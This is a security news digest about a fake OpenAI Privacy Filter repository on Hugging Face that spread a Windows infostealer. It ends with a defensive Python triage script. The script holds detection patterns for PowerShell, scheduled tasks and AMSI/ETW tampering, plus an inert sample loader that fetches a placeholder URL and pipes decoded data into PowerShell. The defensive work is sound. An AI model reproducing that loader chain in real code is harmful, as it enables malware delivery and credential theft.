Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face

TL;DR Summary
A clone of OpenAI's Privacy Filter on Hugging Face impersonated the legitimate model to distribute a Windows infostealer. Its loader downloads payloads through Base64, JSON Keeper, and PowerShell, then sets up a one-shot scheduled task to run the final malware. The chain exfiltrates data (screenshots, crypto wallets, browser data) to a remote domain while attempting to evade detection by disabling AMSI/ETW. The repo peaked at #1 with about 244,000 downloads before being disabled. Researchers link it to similar loaders and ValleyRAT-related campaigns targeting open-source ecosystems.
- Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads (The Hacker News)
- Supply Chain Attack: Fake OpenAI Repository on Hugging Face Distributes Infostealer Malware Targeting Developers and AI Tools (Rescana)
- Fake OpenAI Hugging Face OpenAI Repo Pushed Infostealer Malware (WinBuzzer)
- Fake OpenAI repository on Hugging Face pushes infostealer malware (BleepingComputer)
- A fake privacy model on Hugging Face exposed the open model supply chain’s blind spot (Startup Fortune)
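A static triage pass over a downloaded model repo for the loader behaviours the summary lists (Base64, JSON Keeper, PowerShell, scheduled task, AMSI/ETW), added here as an example and not taken from the article or any vendor's tooling. The regex patterns, the `threshold` of 3 and the sample files are assumptions constructed for illustration, not published indicators.

```python
import re
from pathlib import Path

# Heuristics for the behaviours named in the summary. The patterns are
# assumptions chosen for illustration, not published indicators.
INDICATORS = {
    "base64_decode": re.compile(r"b64decode|FromBase64String", re.I),
    "json_keeper": re.compile(r"json\s*keeper", re.I),
    "powershell_spawn": re.compile(r"powershell|pwsh", re.I),
    "scheduled_task": re.compile(r"schtasks|Register-ScheduledTask", re.I),
    "amsi_etw_tamper": re.compile(r"AmsiScanBuffer|EtwEventWrite", re.I),
}
TEXT_SUFFIXES = {".py", ".ps1", ".bat", ".cmd", ".json", ".txt", ".md", ""}

def scan_text(text):
    """Return the sorted names of indicators that match one file's text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def triage(files, threshold=3):
    """Flag a file only when >= threshold distinct behaviours co-occur."""
    report = {}
    for path, text in files.items():
        hits = scan_text(text)
        if len(hits) >= threshold:
            report[path] = hits
    return report

def load_repo(root, max_bytes=1_000_000):
    """Read small text-like files from a snapshot; nothing is executed."""
    files = {}
    for p in Path(root).rglob("*"):
        if (p.is_file() and p.suffix.lower() in TEXT_SUFFIXES
                and p.stat().st_size <= max_bytes):
            files[str(p.relative_to(root))] = p.read_text(errors="replace")
    return files

# Constructed, inert sample standing in for a downloaded repo.
SAMPLE = {
    "README.md": "Privacy filter model card. Usage: python run.py",
    "utils/encode.py": "import base64\nprint(base64.b64decode('aGk='))",
    "run.py": ("import base64, subprocess\n"
               "cfg = fetch('<json keeper url placeholder>')\n"
               "subprocess.run(['powershell', '-c', base64.b64decode(cfg)])\n"
               "# followed by: schtasks /create ... (one-shot task)\n"),
}
if __name__ == "__main__":
    for path, hits in triage(SAMPLE).items():
        print(f"REVIEW {path}: {', '.join(hits)}")
```

For a real snapshot, pass `load_repo("<path to downloaded repo>")` to `triage`; a flagged file is a prompt for manual review before any code from the repo is run, not a verdict.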
Original article: The Hacker News